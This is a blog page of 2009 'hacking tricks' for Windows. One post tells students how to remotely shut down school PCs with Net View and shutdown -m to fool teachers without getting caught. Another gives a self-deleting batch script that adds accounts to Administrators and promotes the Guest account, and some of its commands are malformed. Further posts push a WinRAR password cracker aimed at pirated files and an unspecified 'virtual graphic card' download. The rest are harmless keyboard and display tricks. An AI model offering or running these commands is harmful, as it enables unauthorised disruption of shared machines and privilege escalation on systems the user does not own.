Showing posts with label windows. Show all posts
Showing posts with label windows. Show all posts

Shutdown Pc's at School

Posted by Agent X | Sunday, May 10, 2009 | , | 4 comments »

Do u know , we can easily switch off all PC's in school and colleges and this is one of the most important trick which i did in my coll and fooled most of teachers . make sure that you dont get caught . . .

So here I go thankfully there's the shutdown function in cmd mode

First of all you need to have access to a cmd prompt on the network for this to work.

If it's disabled you can obviously run everything from .bat files.

So first type in

Code:
Net View


This will give you all the names for all the computers on the network.

Then you want to find a target and write it down, so for example a name is //045-comproom1-05 then you will utilize that name to shutdown the computer.

Now next step is to do the following one

Code:
shutdown -i


which will give you a gui interface and you'll be able to shutdown whichever computer you want with it, you can set a time, even throw in a funny comment like "owned" or somethin Smile.

commands you will use if you just wanna use the command interface are

Code:
shutdown -m //computername
- shutsdown the pc.

Code:
shutdown -m -c "owned"
shutdown with a comment.

Code:
shutdown -l
logoff the user.

Code:
shutdown -r
restart the computer.

and so on...


So thats it you are done and now u can shut down any PC connected in a network and make ur teachers fool . . Feel free to ask any doubts regarding this here . .

Read More......

Nowadays its possible to convert any GUEST account into ADMIN just by few basic tricks . All you need to do is copy the code below,


copy/paste it into Notepad and save it as Guest2admin.bat on your desktop.


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0





Double-click the file to execute or type the above-given code in Command Prompt.

Note: This also creates a net account which is also accessible through nets open and feel free to post any queries regarding this . .

Read More......

Virtual graphic card

Posted by Agent X | Sunday, May 10, 2009 | , , | 3 comments »

This is one of the most interesting trick and it may not be useful for all of them but especially for DIE HARD FANS of PC games . So here comes my post .
Do u know what a GPU is ??
If no is your answer then I will help u out , first GPU stands for graphics processing unit and they are present in the form of internal or external graphic cards in home PC , internal graphic cards are present in along with your processor and external are the one which has to be bought from the market and then use in in the VGA PORT of ur PC , but the external one is the most costliest one and cannot be bought by all people especially students , so that the user may face many difficulties in playing games like FIFA 09 , POP etc which require high graphics , so the only solution for all ur problems is to use emulater and increase your graphics level as high as possible and then play the games which are too good in graphics ..


Click here to download the virtual graphic card ...

NOTE : This is just a trick to play high GRAPHIC games with minimum quality as possible and it is no use if you dont have minimum RAM required to run the game . .

Any queries ? Then feel free to post here .. . . .

Read More......

Winrar Password remover

Posted by Agent X | Sunday, May 10, 2009 | , , | 3 comments »

Most of the .RAR files downloaded in net will contain a password and the one who uploads usually does this to earn money and mostly u guys try to avoid this files or downloads , because you loose your earning for many pirated things . So the only case to get rid of it is to break the password and this can be easily done in few steps , all that u need is to download this file and follow the steps

Click here to download and enjoy !!!

Read More......

Windows Tricks

Posted by Agent X | Friday, May 08, 2009 | , | 0 comments »

Here are some keyboard tricks you can use to impress your friends! These are nothing but less known features of the Windows XP operating system. To revert back the screen to previous state, repeat the key combination again.

Trick 1 : (High Contrast) - Hold Shift, Alt and Print Screen keys together. Click on “OK” when a message appears (this enables high contrast on Windows system). The screen should change to black!

Trick 2 : (Magnifier) - Hold Windows key (logo key) and R key together. Type magnify in the run box and then press Enter. This enables magnifier tool and anything near the mouse trail will now appear magnified on top!

Trick 3 : (Invert Windows screen) - This is one of the scariest tricks which turns Windows upside down. You can press Ctrl, Alt and then any of the four arrow keys (Ctrl-Alt-Down will rotate screen by 180 degrees)! I have noticed that this doesn’t work on certain Windows XP machines (It is dependent on video driver).




Note : For further trickz like this , just CLICK HERE

Read More......

Enable right click

Posted by Agent X | Friday, May 08, 2009 | , , | 1 comments »

Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.

It's easy to change, assuming your using IE:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.

Read More......

Keyboard Disco

Posted by Agent X | Friday, May 08, 2009 | , , | 0 comments »

These codes when executed makes your Caps, Num, Scroll lock keys flash..
very kewlll...i have tried it...

Instructions :

*paste any of the codes in notepad
*Save as AnyFileName.vbs
*Run the file
*to stop, launch task manager and then under "Processes", end wscript.exe

1.This piece of code makes your keyboard a live disco...

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


2.This one makes it looks like a chain of light....

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 200
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 50
wshshell.sendkeys "{SCROLLLOCK}"
loop

Well i tried this and it worked for me . If u have any queries just feel free and

Read More......